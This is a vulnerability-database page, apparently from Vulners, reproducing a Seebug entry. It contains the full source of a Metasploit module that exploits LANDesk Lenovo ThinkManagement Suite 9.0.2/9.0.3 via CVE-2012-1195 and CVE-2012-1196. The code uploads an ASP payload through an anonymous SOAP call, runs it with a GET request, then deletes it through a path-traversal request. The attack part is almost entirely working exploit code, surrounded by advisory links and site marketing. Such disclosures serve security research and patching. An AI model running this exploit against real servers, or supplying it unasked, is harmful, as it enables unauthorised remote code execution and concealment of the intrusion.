Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LANDesk Lenovo ThinkManagement Console Remote Command Execution

🗓️ 12 Apr 2012 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 36 Views

LANDesk Lenovo ThinkManagement Console Remote Command Execution module for executing payload on LANDesk Lenovo ThinkManagement Suite 9.0.2 and 9.0.3 by uploading ASP script via SOAP request

Related
Code
ReporterTitlePublishedViews
Family
0day.today		LANDesk Lenovo ThinkManagement Console Remote Command Execution
8 Apr 201200:00
zdt
Circl		CVE-2012-1195
19 Mar 201200:00
circl
Circl		CVE-2012-1196
19 Mar 201200:00
circl
Check Point Advisories		LANDesk ThinkManagement Suite ServerSetup.asmx Directory Traversal (CVE-2012-1195)
11 Jun 201200:00
checkpoint_advisories
Check Point Advisories		LANDesk ThinkManagement Suite SetTaskLogByFile Arbitrary File Deletion (CVE-2012-1196)
30 Jul 201200:00
checkpoint_advisories
CVE		CVE-2012-1195
18 Feb 201200:00
cve
CVE		CVE-2012-1196
18 Feb 201200:00
cve
Cvelist		CVE-2012-1195
18 Feb 201200:00
cvelist
Cvelist		CVE-2012-1196
18 Feb 201200:00
cvelist
d2		DSquare Exploit Pack: D2SEC_THINKMNGT
18 Feb 201200:55
d2
Rows per page

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize
    super(
      'Name'        => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
      'Description'    => %q{
          This module can be used to execute a payload on LANDesk Lenovo
        ThinkManagement Suite 9.0.2 and 9.0.3.

        The payload is uploaded as an ASP script by sending a specially crafted
        SOAP request to "/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
        , via a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
        as the argument.

        After execution, the ASP script with the payload is deleted by sending
        another specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
        via a "SetTaskLogByFile" operation.
      },
      'Author'      => [
        'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
        'juan vazquez' # Metasploit module
      ],
      'Version'     => '$Revision: $',
      'Platform'    => 'win',
      'References'  =>
        [
          ['CVE', '2012-1195'],
          ['CVE', '2012-1196'],
          ['OSVDB', '79276'],
          ['OSVDB', '79277'],
          ['BID', '52023'],
          ['URL', 'http://www.exploit-db.com/exploits/18622/'],
          ['URL', 'http://www.exploit-db.com/exploits/18623/']
        ],
      'Targets'     =>
        [
          [ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 15 2012'
    )

    register_options(
      [
        OptString.new('PATH', [ true,  "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
      ], self.class)
  end

  def exploit

    peer = "#{rhost}:#{rport}"

    # Generate the ASP containing the EXE containing the payload
    exe = generate_payload_exe
    asp = Msf::Util::EXE.to_exe_asp(exe)

    # htmlentities like encoding
    asp = asp.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">")

    uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
    upload_random = rand_text_alpha(rand(6) + 6)
    upload_xml_path = "ldlogon\\#{upload_random}.asp"

    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RunAMTCommand xmlns="http://tempuri.org/">
      <Command>-PutUpdateFileCore</Command>
      <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
      <Data2>#{upload_xml_path}</Data2>
      <Data3>#{asp}</Data3>
      <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
    </RunAMTCommand>
  </soap:Body>
</soap:Envelope>
    eos

    #
    # UPLOAD
    #
    attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
    print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...")

    res = send_request_cgi({
      'uri'          => attack_url,
      'method'       => 'POST',
      'ctype'        => 'text/xml; charset=utf-8',
      'headers'  => {
          'SOAPAction'     => "\"http://tempuri.org/RunAMTCommand\"",
        },
      'data'         => soap,
    }, 20)

    if (! res)
      print_status("#{peer} - Timeout: Trying to execute the payload anyway")
    elsif (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]")
      return
    end

    #
    # EXECUTE
    #
    upload_path = uri_path + "ldlogon/#{upload_random}.asp"
    print_status("#{peer} - Executing #{upload_path}...")

    res = send_request_cgi({
      'uri'          =>  upload_path,
      'method'       => 'GET'
    }, 20)

    if (! res)
      print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
      return
    end

    if (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
      return
    end


    #
    # DELETE
    #
    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetTaskLogByFile xmlns="http://tempuri.org/">
      <computerIdn>1</computerIdn>
      <taskid>1</taskid>
      <filename>../#{upload_random}.asp</filename>
      </SetTaskLogByFile>
  </soap:Body>
</soap:Envelope>
    eos

    attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
    print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...")

    res = send_request_cgi({
      'uri'          => attack_url,
      'method'       => 'POST',
      'ctype'        => 'text/xml; charset=utf-8',
      'headers'      => {
          'SOAPAction'     => "\"http://tempuri.org/SetTaskLogByFile\"",
        },
      'data'         => soap,
    }, 20)

    if (! res)
      print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
      return
    elsif (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]")
      return
    end

    handler
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Apr 2012 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.86542
metasploitremote command executionlenovo thinkmanagement suitewindows server 2003 sp2soap requestvulnerability discoverycve-2012-1195cve-2012-1196
36